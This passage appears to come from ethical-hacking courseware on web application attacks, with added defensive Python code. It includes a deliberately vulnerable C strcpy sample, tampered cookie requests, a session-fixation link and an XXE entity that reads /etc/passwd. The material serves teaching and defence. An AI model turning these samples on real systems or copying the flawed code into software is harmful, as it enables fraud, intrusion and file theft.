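        self.hits = defaultdict(deque)

    def allow(self, key, now):
        q = self.hits[key]
        while q and now - q[0] >= self.window:
            q.popleft()                       # expire attempts outside the window
        if len(q) >= self.max_attempts:
            return False
        q.append(now)
        return True


LIMITER = SlidingWindowLimiter(max_attempts=5, window=60)


def hardened_login(username, password, client_ip, now):
    """One generic message for every failure, the password check always run,
    and throttling by source address instead of account lockout. `now` is
    passed in (seconds) so the behaviour can be exercised without sleeping."""
    if not LIMITER.allow(client_ip, now):
        return "too many attempts, try again later"
    if check_password(username, password):
        return "ok"
    return "invalid username or password"
```

Per-address throttling is not complete on its own (a distributed attacker has many addresses), so production systems pair it with CAPTCHA or step-up authentication after a burst of failures on an account, which slows the attacker without taking the account away from its owner.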


Buffer Overflow Attacks

Buffer overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold

A buffer overflow attack allows an attacker to modify the target process's address space in order to control the process execution, crash the process, and modify internal variables

Attackers modify function pointers used by the application to direct program execution through a jump or call instruction and point it to a location in memory containing malicious code

Vulnerable Code (the unbounded strcpy() is the defect):

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[]) {
        char *dest_buffer;
        dest_buffer = (char *) malloc(10);      /* 10-byte heap buffer */
        if (NULL == dest_buffer)
            return -1;
        if (argc > 1) {
            /* No bounds check: an argument of 10 or more bytes (plus the
               terminating NUL) overflows dest_buffer into adjacent heap memory */
            strcpy(dest_buffer, argv[1]);
            printf("The first command-line argument is %s.\n", dest_buffer);
        } else {
            printf("No command-line argument was given.\n");
        }
        free(dest_buffer);
        return 0;
    }

Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 18: Buffer Overflow.


Buffer Overflow Attacks

A buffer has a specified data storage capacity, and if the amount of data written exceeds that capacity, the buffer overflows; that is, a buffer overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold. Typically, buffers are designed to hold a finite amount of data; additional information can be directed wherever it needs to go. However, the extra information may overflow into neighboring buffers, destroying or overwriting legitimate data.

Arbitrary Code

A buffer overflow attack allows an attacker to modify the target process's address space in order to control the process execution, crash the process, and modify internal variables. When a buffer overflows, the execution stack of a web application is damaged. An attacker can then send specially crafted input to the web application so that the web application executes the arbitrary code, allowing the attacker to successfully take over the machine. Attackers modify function pointers used by the application to redirect the program execution through a jump or call instruction to a location in the memory containing malicious code. Buffer overflows are not easy to discover, and even upon discovery they are difficult to exploit. However, an attacker who recognizes a potential buffer overflow can access a staggering array of products and components.


Cookie/Session Poisoning

Cookies are used to maintain session state in the otherwise stateless HTTP protocol.

Modify the Cookie Content: Cookie poisoning attacks involve the modification of the contents of a cookie (personal information stored in a web user's computer) in order to bypass security mechanisms.

Inject the Malicious Content: Poisoning allows an attacker to inject the malicious content, modify the user's online experience, and obtain unauthorized information.

Rewriting the Session Data: A proxy can be used for rewriting the session data, displaying the cookie data, and/or specifying a new user ID or other session identifiers in the cookie.


Cookie/Session Poisoning

Cookies frequently transmit sensitive credentials and can be modified with ease to escalate access or assume the identity of another user.

Cookies are used to maintain a session state in the otherwise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the web application. Poisoning of cookies and session information can allow an attacker to inject malicious content or otherwise modify the user's online experience and obtain unauthorized information.

Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. Cookies exist as files stored in the client computer's memory or hard disk. By modifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer the ability to "Remember me?" and store the user's information in a cookie, so he or she does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. In an attempt to protect cookies, site developers often encode the cookies. Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet 13 characters) give many who view cookies a false sense of security.


How Cookie Poisoning Works

[Figure: how cookie poisoning works, between User, Web Server (www.juggyshop.com) and Attacker]

1. User browses a web page. The web server replies with the requested page and sets a cookie on the user's browser:

    GET /store/buy.aspx?checkout=yes HTTP/1.0
    Host: www.juggyshop.com
    Accept: */*
    Referrer: http://www.juggyshop.com/showprods.aspx
    Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=11568;

2. Attacker steals the cookie (sniffing, XSS, phishing attack) and orders the product using a modified cookie:

    GET /store/buy.aspx?checkout=yes HTTP/1.0
    Host: www.juggyshop.com
    Accept: */*
    Referrer: http://www.juggyshop.com/showprods.aspx
    Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=100;

3. Product is delivered to the attacker's address.


How Cookie Poisoning Works

Cookies are mainly used by web applications to simulate a stateful experience for the end user. They are used as an identity for the server side of web application components. This attack alters the value of a cookie on the client side prior to the request to the server. A web server can send a Set-Cookie header with any response, specifying the cookie's string and attributes. The cookies are stored on the user's computer and are a standard way of recognizing users. Once a cookie has been set, it is sent with every subsequent request to the web server. To provide further functionality to the application, cookies can be modified and analyzed by JavaScript.

In this attack, the attacker sniffs the user's cookies, then modifies the cookie parameters and submits them to the web server. The server then accepts the attacker's request and processes it.
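The checkout in the figure fails because the server trusts the TotalPrice value the client sends back. The following added example (not part of the original module) shows a server-side defence in Python: the basket cookie carries only item IDs under an HMAC, the server recomputes the total from its own catalogue, and any edited cookie is rejected before the order is processed. The catalogue prices and the signing key are constructed values.

```python
import hashlib
import hmac

# Constructed server-side catalogue: item ID -> unit price (same IDs as the figure).
CATALOGUE = {"1258": 5000, "2658": 3568, "6652": 3000}

# Constructed secret; a real deployment loads this from a key store, never from code.
COOKIE_KEY = b"constructed-demo-key-do-not-reuse"


def _sign(payload: str) -> str:
    """HMAC-SHA256 over the cookie payload, hex encoded."""
    return hmac.new(COOKIE_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_basket_cookie(item_ids) -> str:
    """Build the Cookie value the server sets after the user fills the basket.

    Only item IDs are stored; the price is deliberately NOT placed in the cookie,
    so there is nothing price-related for the client to edit."""
    items = "; ".join("Item%d=%s" % (i + 1, iid) for i, iid in enumerate(item_ids))
    payload = "BasketSize=%d; %s" % (len(item_ids), items)
    return payload + "; Sig=" + _sign(payload)


def parse_cookie(cookie: str) -> dict:
    """Split 'k=v; k=v' into a dict; empty parts and whitespace are ignored."""
    out = {}
    for part in cookie.split(";"):
        part = part.strip()
        if part and "=" in part:
            key, value = part.split("=", 1)
            out[key.strip()] = value.strip()
    return out


def checkout_total(cookie: str):
    """Return the server-computed total for a signed basket cookie.

    Returns None when the signature does not match (the cookie was edited or
    extended, e.g. with TotalPrice=100) or when an item is not in the catalogue."""
    if "; Sig=" not in cookie:
        return None
    payload, sig = cookie.rsplit("; Sig=", 1)
    if not hmac.compare_digest(_sign(payload), sig):   # constant-time comparison
        return None
    fields = parse_cookie(payload)
    try:
        size = int(fields.get("BasketSize", "0"))
        item_ids = [fields["Item%d" % i] for i in range(1, size + 1)]
        return sum(CATALOGUE[iid] for iid in item_ids)
    except (KeyError, ValueError):
        return None
```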


Session Fixation Attack

In a session fixation attack, the attacker tricks the user to access a genuine web server using an explicit session ID value. The attacker assumes the identity of the victim and exploits his credentials at the server.

1. Attacker logs on to the bank website using his credentials.
2. Web server (juggybank.com) sets a session ID on the attacker's machine.
3. Attacker sends an email containing a link with a fixed session ID: http://juggybank.dom/login.jsp?sessionid=4321
4. User clicks on the link and is redirected to the bank website.
5. User logs in to the server using his credentials and the fixed session ID.
6. Attacker logs in to the server using the victim's credentials with the same session ID.


Session Fixation Attacks

Session fixation helps an attacker to hijack a valid user session. In this attack, the attacker authenticates him or herself with a known session ID and then lures the victim to use the same session ID. If the victim uses the session ID sent by the attacker, the attacker hijacks the user-validated session with the knowledge of the used session ID.

The session fixation attack procedure is explained with the help of the following diagram:

[Figure: session fixation between Attacker, Server (juggybank.com) and User]

1. Attacker logs on to the bank website using his credentials.
2. Web server sets a session ID on the attacker's machine.
3. Attacker sends an email containing a link with a fixed session ID: http://juggybank.dom/login.jsp?sessionid=4321
4. User clicks on the link and is redirected to the bank website.
5. User logs in to the server using his credentials and the fixed session ID.
6. Attacker logs in to the server using the victim's credentials with the same session ID.

FIGURE 13.26: How Cookie Poisoning Works


Insufficient Transport Layer Protection

Insufficient transport layer protection supports weak algorithms, and uses expired or invalid certificates.

An underprivileged SSL setup can also help the attacker to launch phishing and MITM attacks.

This vulnerability exposes user's data to untrusted third parties and can lead to account theft.


Insufficient Transport Layer Protection

SSL/TLS should be used for authentication on websites; otherwise the attacker can monitor network traffic to steal an authenticated user's session cookie.

Insufficient transport layer protection may allow untrusted third parties to obtain unauthorized access to sensitive information. The communication between the website and the client should be properly encrypted, or data can be intercepted, injected, or redirected. Various threats such as account theft, phishing attacks, and compromise of admin accounts may follow once systems are compromised.


Improper Error Handling

Improper error handling gives insight into source code such as logic flaws, default accounts, etc.

Using the information received from an error message, an attacker identifies vulnerabilities.

Information Gathered:
• Out of memory
• Null pointer exceptions
• System call failure
• Database unavailable
• Network timeout
• Database information
• Web application logical flow
• Application environment

Example of a verbose error page (http://juggyboy.com/):

    General Error
    Could not obtain post/user information
    DEBUG MODE
    SQL Error: 1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145)
    SELECT u.username, u.user_id, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_sig_bbcode_uid, u.user_allowsmile, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid FROM nuke_bbposts p, nuke_users u, nuke_bbposts_text pt WHERE p.topic_id = '1547' AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time ASC LIMIT 0, 15
    Line: 435
    File: /user/home/geeks/www/vonage/modules/Forums/viewtopic.php


Improper Error Handling

Improper error handling may result in various types of security issues for a website, especially when internal error messages such as stack traces, database dumps, and error codes are displayed to the attacker. An attacker can get various details related to the network, version, etc. Improper error handling gives insight into source code such as logic flaws, default accounts, etc. Using the information received from an error message, an attacker identifies vulnerabilities for launching attacks.

Improper error handling may allow an attacker to gather information such as:

• Out of memory
• Null pointer exceptions
• System call failure
• Database unavailable
• Network timeout
• Database information
• Web application logical flow
• Application environment
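The slide's DEBUG MODE page leaks the SQL statement, the data file name and the script path. The following added example (not part of the original module) shows the usual fix in Python: full detail is written to the server log under an incident ID, and the client receives only a generic message with that ID. The DatabaseError class and the view_topic handler are constructed stand-ins for a real driver exception and request handler.

```python
import logging
import traceback
import uuid

log = logging.getLogger("app")


class DatabaseError(Exception):
    """Constructed stand-in for a DB driver exception carrying the failing query."""

    def __init__(self, message: str, sql: str):
        super().__init__(message)
        self.sql = sql


def leaks_internals(body: str) -> bool:
    """Cheap response check (for a test suite or an outbound filter):
    does the body expose SQL, file paths, or stack frames?"""
    markers = ("SELECT ", " FROM ", "Traceback", "File:", ".php", "/home/", "errno")
    return any(m in body for m in markers)


def render_error(exc: BaseException, debug: bool = False) -> dict:
    """Build the HTTP response for an unhandled exception.

    debug=True reproduces the unsafe 'DEBUG MODE' page from the slide;
    debug=False is the production setting."""
    incident = uuid.uuid4().hex
    detail = "".join(traceback.format_exception(type(exc), exc, exc.__traceback__))
    # Everything useful to the developer goes to the server log, keyed by incident ID.
    log.error("incident=%s type=%s sql=%s\n%s", incident, type(exc).__name__,
              getattr(exc, "sql", None), detail)
    if debug:
        body = "General Error\n%s\nSQL: %s\n%s" % (exc, getattr(exc, "sql", ""), detail)
    else:
        # The client learns only that something failed and how to reference it.
        body = "An internal error occurred. Reference: %s" % incident
    return {"status": 500, "body": body, "incident": incident}


def view_topic(topic_id: str, debug: bool = False) -> dict:
    """Constructed handler that fails the way the slide's forum page did."""
    sql = ("SELECT u.username, p.*, pt.post_text FROM nuke_bbposts p, nuke_users u, "
           "nuke_bbposts_text pt WHERE p.topic_id = ? AND pt.post_id = p.post_id")
    try:
        raise DatabaseError("1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145)", sql)
    except DatabaseError as exc:
        return render_error(exc, debug=debug)
```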


Insecure Cryptographic Storage


Insecure Cryptographic Storage

Web applications use cryptographic algorithms to encrypt their data and other sensitive information that is transferred from server to client or vice versa. The web application uses cryptographic code to encrypt the data. Insecure cryptographic storage refers to the situation in which an application uses poorly written encryption code to encrypt and store sensitive data in the database.

Insecure cryptographic storage describes the state of an application where poor encryption code is used for storing data in the database. Such insecurely stored data can easily be read and modified by an attacker to obtain confidential and sensitive information such as credit card information, passwords, SSNs, and other authentication credentials that were not protected with appropriate encryption or hashing, and then used to launch identity theft, credit card fraud, or other crimes. Developers can avoid such attacks by using proper algorithms to encrypt the sensitive data.

The following pictorial representation shows the vulnerable code that is poorly encrypted and secure code that is properly encrypted using a secure cryptographic algorithm.
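As an added example (not from the original module), the following Python code contrasts the reversible "encoding" that the module warns about (Base64, as easily undone as ROT13) with salted, slow password hashing, and builds on it a login routine whose failure message and work factor do not reveal whether a username exists, which addresses the user enumeration threat described earlier. Only the standard library is used; the user record is constructed and the iteration count is kept low for the demo.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 50_000   # constructed value for the demo; production uses a much higher count

# --- insecure storage: reversible encoding is not encryption ------------------------
def store_password_insecure(password: str) -> str:
    """What 'poorly written encryption code' typically looks like: Base64 is decodable by anyone."""
    return base64.b64encode(password.encode()).decode()


def recover_insecure(stored: str) -> str:
    """Anyone holding a copy of the database can undo the encoding."""
    return base64.b64decode(stored).decode()


# --- secure storage: per-user salt plus a deliberately slow hash ----------------------
def store_password(password: str) -> str:
    """Return 'pbkdf2_sha256$iterations$salt$digest'; the password itself is never stored."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(stored: str, password: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


# Constructed user table: only hashes are stored.
USERS = {"jason": store_password("correct horse battery staple")}

# Hash of a random value, verified when the username is unknown so that the response
# takes the same time as for a real user (no timing-based enumeration).
_DUMMY = store_password(os.urandom(16).hex())

GENERIC_FAILURE = "Invalid username or password"


def login(username: str, password: str):
    """Return (ok, message). The message is identical for unknown user and wrong password."""
    stored = USERS.get(username)
    if stored is None:
        verify_password(_DUMMY, password)   # burn the same work factor as a real check
        return False, GENERIC_FAILURE
    if not verify_password(stored, password):
        return False, GENERIC_FAILURE
    return True, "Welcome"
```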


Broken Authentication and Session Management

An attacker uses vulnerabilities in the authentication or session management functions such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others to impersonate users.

Session ID in URLs: http://juggyshop.com/sale/saleitems=304;jsessionid=120MTOIDPXMOOQSABGCKLHCJUN2JV?dest=NewMexico. Attacker sniffs the network traffic or tricks the user to get the session IDs, and reuses the session IDs for malicious purposes.

Password Exploitation: Attacker gains access to the web application's password database. If user passwords are not encrypted, the attacker can exploit every user's password.

Timeout Exploitation: If an application's timeouts are not set properly and a user simply closes the browser without logging out from sites accessed through a public computer, the attacker can use the same browser later and exploit the user's privileges.


Broken Authentication and Session Management

Authentication and session management includes every aspect of user authentication and managing active sessions. Yet at times even solid authentication fails due to weak credential functions like password change, forgot my password, remember my password, account update, etc. Utmost care has to be taken related to user authentication. It is always better to use strong authentication methods through special software- and hardware-based cryptographic tokens or biometrics. An attacker uses vulnerabilities in the authentication or session management functions such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others to impersonate users.

Session ID in URLs

An attacker sniffs the network traffic or tricks the user to get the session IDs, and reuses the session IDs for malicious purposes.

Example:
http://juggyshop.com/sale/saleitems=304;jsessionid=120MTOIDPXMOOQSABGCKLHCJUN2JV?dest=NewMexico
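The session fixation diagram (the attacker's link http://juggybank.dom/login.jsp?sessionid=4321) and the session-ID-in-URL example above share one root cause: the server accepts a session identifier it did not issue for that user. This added example (not from the original module) shows a minimal server-side session store in Python that ignores IDs carried in the URL, counts such attempts for detection, and issues a fresh ID on login so the attacker's known ID never becomes the authenticated one. The request cookies, the URL strings and the credential check are constructed for the demo.

```python
import secrets
from urllib.parse import parse_qs, urlsplit

SESSION_COOKIE = "JSESSIONID"


def url_carries_session_id(url: str) -> bool:
    """Detection helper (proxy rule, WAF rule or log review): True when the URL
    carries a session identifier in its path (;jsessionid=...) or query (?sessionid=...)."""
    parts = urlsplit(url)
    if ";jsessionid=" in parts.path.lower():
        return True
    return "sessionid" in {k.lower() for k in parse_qs(parts.query)}


def _check_credentials(username: str, password: str) -> bool:
    """Constructed stand-in for the real credential check."""
    return (username, password) == ("victim", "victim-password")


class SessionStore:
    """Server-side session table: sid -> {"user": None or username}."""

    def __init__(self):
        self._sessions = {}
        self.fixation_attempts = 0   # requests that tried to supply an ID via the URL

    @staticmethod
    def _new_sid() -> str:
        return secrets.token_urlsafe(32)   # 256 random bits from the OS CSPRNG

    def session_from_request(self, cookies: dict, url: str) -> str:
        """Resolve the caller's session. Only the cookie is consulted; an ID in the
        URL is counted and ignored, and an unknown ID gets a fresh anonymous session
        rather than being adopted (so a planted 4321 is never honoured)."""
        if url_carries_session_id(url):
            self.fixation_attempts += 1
        sid = cookies.get(SESSION_COOKIE)
        if sid in self._sessions:
            return sid
        sid = self._new_sid()
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, sid: str, username: str, password: str) -> str:
        """Authenticate; on success retire the pre-login ID and return a fresh one."""
        if not _check_credentials(username, password):
            return sid
        self._sessions.pop(sid, None)   # the ID the attacker may know dies here
        new_sid = self._new_sid()
        self._sessions[new_sid] = {"user": username}
        return new_sid

    def user_for(self, sid: str):
        """Username bound to sid, or None for anonymous/unknown sessions."""
        entry = self._sessions.get(sid)
        return entry["user"] if entry else None
```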


Web Services Architecture

[Figure 13.29: web services protocol stack, top to bottom]

    WS-Work Processes
    WS-Security: WS-Federation, WS-SecureConversation, WS-Policy, WS-Trust, WS-SecurityPolicy
    Security Token Profiles: SAML, Kerberos, X.509; XML Encryption; XML Digital Signatures
    XML, SOAP, WSDL, Schema, WS-Advertising, etc.
    Transport: HTTP, .Net TCP Channel, Fast InfoSet, etc.

FIGURE 13.29: Web Services Architecture


Web Services Attack

• Web services evolution and its increasing use in business offers new attack vectors in an application framework

• Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web services


Web Services Attack

Web services evolution and its increasing use in business offers new attack vectors in an application framework. Web services are process-to-process communications that have special security issues and needs. Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web services that are vulnerable to various web application threats. Similar to the way a user interacts with a web application through a browser, a web service can interact directly with the web application without the need for an interactive user session or a browser.

These web services have detailed definitions that allow regular users and attackers to understand the construction of the service. In this way, much of the information required to fingerprint the environment and formulate an attack is provided to the attacker. It is estimated that web services reintroduce 70% of the vulnerabilities on the web. Some examples of this type of attack are:

• An attacker injects a malicious script into a web service, and is able to disclose and modify application data.

• An attacker is using a web service for ordering products, and injects a script to reset quantity and status on the confirmation page to less than what was originally ordered.


Web Services Footprinting Attack

Attackers footprint a web application to get UDDI information such as businessEntity, businessService, bindingTemplate, and tModel.

XML Query:

    POST /inquire HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: ""
    Cache-Control: no-cache
    Pragma: no-cache
    User-Agent: Java/1.4.2_04
    Host: uddi.microsoft.com
    Accept: text/html, image/gif, image/jpeg; q=.2, */*; q=.2
    Connection: keep-alive
    Content-Length: 229

    <?xml version="1.0" encoding="UTF-8" ?>
    <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
    <Body>
    <find_business generic="2.0" maxRows="50" xmlns="urn:uddi-org:api_v2"><name>amazon</name></find_business>
    </Body>
    </Envelope>

XML Response:

    HTTP/1.1 200 OK
    Date: Tue, 28 Sep 2004 10:07:42 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    X-AspNet-Version: 1.1.4322
    Cache-Control: private, max-age=0
    Content-Type: text/xml; charset=utf-8
    Content-Length: 1272

    <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><serviceList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2"><serviceInfos><serviceInfo serviceKey="..." businessKey="..."><name xml:lang="en-us">...</name></serviceInfo>[further serviceInfo entries follow; their serviceKey and businessKey values are not legible in the source]</serviceInfos></serviceList></soap:Body></soap:Envelope>


Web Services Footprinting Attack

Attackers use the Universal Business Registry (UBR) as a major source to gather information about web services. It is very useful for both businesses and individuals. It is a public registry that runs on UDDI specifications and SOAP. It is somewhat similar to a "Whois server" in functionality. To register web services on a UDDI server, businesses or organizations usually use one of the following structures:

• Business Entity
• Business Service
• Binding Template
• Technical Model (tModel)

Hence, attackers footprint a web application to get UDDI information such as businessEntity, businessService, bindingTemplate, and tModel.


Web Services XML Poisoning

• Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic

• Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks

• XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information

XML Request:

    <CustomerRecord>
    <CustomerNumber>2010</CustomerNumber>
    <FirstName>Jason</FirstName>
    <LastName>Springfield</LastName>
    <Address>Apt 20, 3rd Street</Address>
    <Email>jason@springfield.com</Email>
    <PhoneNumber>6325896325</PhoneNumber>
    </CustomerRecord>

Poisoned XML Request:

    <CustomerRecord>
    <CustomerNumber>2010</CustomerNumber>
    <FirstName>Jason</FirstName><CustomerNumber>2010</CustomerNumber>
    <FirstName>Jason</FirstName>
    <LastName>Springfield</LastName>
    <Address>Apt 20, 3rd Street</Address>
    <Email>jason@springfield.com</Email>
    <PhoneNumber>6325896325</PhoneNumber>
    </CustomerRecord>


Web Services XML Poisoning

XML poisoning is similar to a SQL injection attack and has a higher success rate against web services frameworks, because web services are invoked with XML documents and the XML traffic between the server and the client applications can be tampered with. Attackers craft malicious XML documents that subvert the parsing mechanisms, such as the SAX and DOM parsers, used on the server.

Attackers insert malicious XML into SOAP requests to perform XML node manipulation or XML schema poisoning, generating errors in the XML parsing logic and breaking the execution logic. Attackers can also manipulate XML external entity references, which can lead to arbitrary file reads or TCP connection openings and can be exploited for other web service attacks. XML poisoning enables attackers to cause a denial-of-service condition and to compromise confidential information.
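The following is an added example, not code from the courseware: a pre-parse gate for SOAP/XML requests that catches the three poisoning patterns described above (duplicate nodes, external entity declarations, and parser-exhausting documents), plus a small demonstration of why the duplicated CustomerNumber is dangerous. The sample documents are constructed from the CustomerRecord example; the EXPECTED_CHILDREN table stands in for the real XML schema and is an assumption of this example.

```python
import re
import xml.etree.ElementTree as ET
from collections import Counter

# Constructed sample requests, modelled on the CustomerRecord documents above
# (the poisoned one carries a second CustomerNumber with a different value).
CLEAN_REQUEST = b"""<CustomerRecord>
  <CustomerNumber>2010</CustomerNumber>
  <FirstName>Jason</FirstName>
  <LastName>Springfield</LastName>
</CustomerRecord>"""

POISONED_REQUEST = b"""<CustomerRecord>
  <CustomerNumber>2010</CustomerNumber>
  <FirstName>Jason</FirstName><CustomerNumber>9999</CustomerNumber>
  <LastName>Springfield</LastName>
</CustomerRecord>"""

# External entity reference: a resolving parser would read the named file.
XXE_REQUEST = b"""<?xml version="1.0"?>
<!DOCTYPE CustomerRecord [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<CustomerRecord><CustomerNumber>&xxe;</CustomerNumber></CustomerRecord>"""

# Assumed for this example: the only children a CustomerRecord may carry and
# how often each may appear (a hand-written stand-in for the XML schema).
EXPECTED_CHILDREN = {"CustomerNumber": 1, "FirstName": 1, "LastName": 1,
                     "Address": 1, "Email": 1, "PhoneNumber": 1}
MAX_BYTES = 64 * 1024   # size and depth limits against parser-exhaustion DoS
MAX_DEPTH = 32


def naive_customer_numbers(raw):
    """What an unchecked parser sees: ElementTree's find() returns the first
    CustomerNumber, findall()[-1] the last. Which one the application trusts
    is exactly the ambiguity that node manipulation exploits."""
    root = ET.fromstring(raw)
    nodes = root.findall("CustomerNumber")
    return root.find("CustomerNumber").text, nodes[-1].text


def _depth(element, level=1):
    return max([level] + [_depth(child, level + 1) for child in element])


def inspect_xml_request(raw):
    """Return a list of findings; an empty list means the request is acceptable."""
    findings = []
    if len(raw) > MAX_BYTES:
        findings.append("oversized document")
    # Refuse any DTD before parsing: that is where external entities (XXE)
    # and entity-expansion bombs are declared. Checked on the raw bytes so
    # nothing reaches an entity-resolving parser.
    if re.search(rb"<!DOCTYPE|<!ENTITY", raw, re.IGNORECASE):
        findings.append("DTD/entity declaration present (XXE risk)")
        return findings
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        findings.append("malformed XML: %s" % exc)
        return findings
    if _depth(root) > MAX_DEPTH:
        findings.append("nesting too deep")
    # Node-manipulation check: duplicated or unexpected child elements.
    counts = Counter(child.tag for child in root)
    for tag, n in counts.items():
        if tag not in EXPECTED_CHILDREN:
            findings.append("unexpected element <%s>" % tag)
        elif n > EXPECTED_CHILDREN[tag]:
            findings.append("<%s> appears %d times, expected %d"
                            % (tag, n, EXPECTED_CHILDREN[tag]))
    return findings


if __name__ == "__main__":
    print("first/last CustomerNumber in poisoned request:",
          naive_customer_numbers(POISONED_REQUEST))
    for name, doc in [("clean", CLEAN_REQUEST), ("poisoned", POISONED_REQUEST),
                      ("xxe", XXE_REQUEST)]:
        print(name, "->", inspect_xml_request(doc) or "OK")
```

The DTD check runs on the raw bytes on purpose: a parser that resolves entities has already done the damage by the time the tree is available, so the only safe place to reject external entities is before parsing.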


Hacking Methodology

Module Flow

So far, we have discussed web application components and the various threats associated with web applications. Now we discuss the web application hacking methodology: a systematic way to check every possible route to compromising the web application by attempting to exploit every potential vulnerability present in it.

This section gives a detailed explanation of the web application hacking methodology.


Web App Hacking Methodology

To hack a web application, the attacker first tries to gather as much information as possible about the web infrastructure. Footprinting is a method by which an attacker gathers valuable information about the web infrastructure or the web application.


Footprint Web Infrastructure

Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications

Server Discovery: discover the physical servers that host the web application
Service Discovery: discover the services running on the web servers that can be exploited as attack paths for web app hacking
Server Identification: grab server banners to identify the make and version of the web server software
Hidden Content Discovery: extract content and functionality that is not directly linked or reachable from the main visible content


Footprint Web Infrastructure

Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications. Through web infrastructure footprinting, an attacker can perform:

Server Discovery

Server discovery identifies the physical servers that host the web application and confirms that they are reachable on the Internet.

Service Discovery

Service discovery finds the services running on the web servers that can be exploited as attack paths for web app hacking. It scans the targeted application environment for listening ports and the services behind them.

Server Identification

Grab the server banners to identify the make and version of the web server software from the response headers, in particular the Server header.


Footprint Web Infrastructure: Server Discovery

Server discovery gives information about the location of servers and ensures that the target server is alive on the Internet

Whois lookup utilities give information about the IP address of the web server and its DNS names

Whois Lookup Tools: http://www.tamos.com, http://www.whois.net, http://netcraft.com, http://www.dnsstuff.com

DNS interrogation provides information about the location and type of servers

DNS Interrogation Tools: http://www.dnsstuff.com, http://e-dns.org, http://network-tools.com, http://www.domaintools.com

Port scanning attempts to connect to a particular set of TCP or UDP ports to find out which services exist on the server

Port Scanning Tools: Nmap, WhatsUp PortScanner Tool, NetScan Tools Pro, Hping


Footprint Web Infrastructure: Server Discovery

To footprint a web infrastructure, first discover the active servers on the Internet. Server discovery gives information about the location of the active servers on the Internet. Three techniques, namely whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.

Whois Lookup

A whois lookup gathers information about a domain with the help of DNS and WHOIS queries; the tools listed below present the result as an HTML report. It gives information about the IP address of the web server and its DNS names. Some of the whois lookup tools are:

- http://www.tamos.com
- http://netcraft.com
- http://www.whois.net
- http://www.dnsstuff.com

DNS Interrogation

DNS interrogation queries the Domain Name System, a distributed database that is used by varied organizations to


Footprint Web Infrastructure: Service Discovery

Service discovery finds the services running on web servers that can be exploited as attack paths for web application hacking. It scans the targeted application environment for listening ports and the services behind them. The targeted server has to be scanned thoroughly so that the common ports used by web servers for different services can be identified.

The table that follows lists common ports used by web servers and the respective HTTP services:

Port    Typical HTTP Services
80      World Wide Web standard port
81      Alternate WWW
88      Kerberos
443     SSL (https)
900     IBM WebSphere administration client
2301    Compaq Insight Manager


Footprint Web Infrastructure: Server Identification/Banner Grabbing

Analyze the server response header field to identify the make, model, and version of the web server software

This information helps attackers to select the exploits from vulnerability databases to attack a web server and its applications

    C:\> telnet www.juggyboy.com 80
    HEAD / HTTP/1.0

    HTTP/1.1 200 OK
    Server: [value identifies the server as Microsoft IIS]
    Content-Type: text/html
    Content-Length: 1270
    Set-Cookie: [session cookie; value not legible in the original]
    Via: 1.1 Application and Content Networking System Software 5.1.15
    Connection: Close

    Connection to host lost.

Banner grabbing tools: 1. Telnet 2. Netcat 3. ID Serve 4. Netcraft
H

Footprint Web Infrastructure: Server Identification/Banner Grabbing

